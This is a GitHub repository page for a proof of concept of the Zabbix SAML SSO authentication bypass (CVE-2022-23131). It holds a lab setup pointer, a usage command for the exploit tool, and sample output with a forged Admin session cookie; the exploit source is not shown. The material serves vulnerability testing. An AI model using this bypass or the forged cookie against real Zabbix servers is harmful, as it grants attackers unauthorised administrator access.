Zabbix SAML SSO Login Bypass Vulnerability CVE-2022-23131

Enviroment and Poc of CVE-2022-23131

Enviroment

You can create a Zabbix with SAML SSO follow the step in Zabbix Enviroment for CVE-2022-23131.

Poc

The Poc was modified from jweny

Usage:

go run poc.go check -t http://localhost:8080 -u Admin

[INFO] 2022/02/24 19:49 vul exist! target: http://localhost:8080, cookie: eyJzYW1sX2RhdGEiOnsidXNlcm5hbWVfYXR0cmlidXRlIjoiQWRtaW4ifSwic2Vzc2lvbmlkIjoiYmYyMzAxMWU1YWMyOWE1MjFlN2E1ZDZjMTAwZDQ2NjAiLCJzaWduIjoiaytKblhjVjlhQmJRa3NJc21oMVRwVEhrMGFDSTJOYkM1VGNTU1doczQ3YVIrNmpWZ1BKOGw5cWZhZlRmcjA3VGVKalNZcW5kZWRPWEtleklmS0Fjb3c9PSJ9

Name		Name	Last commit message	Last commit date
Latest commit History 6 Commits
.gitignore		.gitignore
LICENSE		LICENSE
README.md		README.md
go.mod		go.mod
go.sum		go.sum
poc.go		poc.go

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

.gitignore

.gitignore

LICENSE

LICENSE

README.md

README.md

go.mod

go.mod

go.sum

go.sum

poc.go

poc.go

Repository files navigation

Zabbix SAML SSO Login Bypass Vulnerability CVE-2022-23131

Enviroment

Poc

About

Releases

Packages

Languages

License

trganda/CVE-2022-23131

Folders and files

Latest commit

History

Repository files navigation

Zabbix SAML SSO Login Bypass Vulnerability CVE-2022-23131

Enviroment

Poc

About

Resources

License

Stars

Watchers

Forks

Languages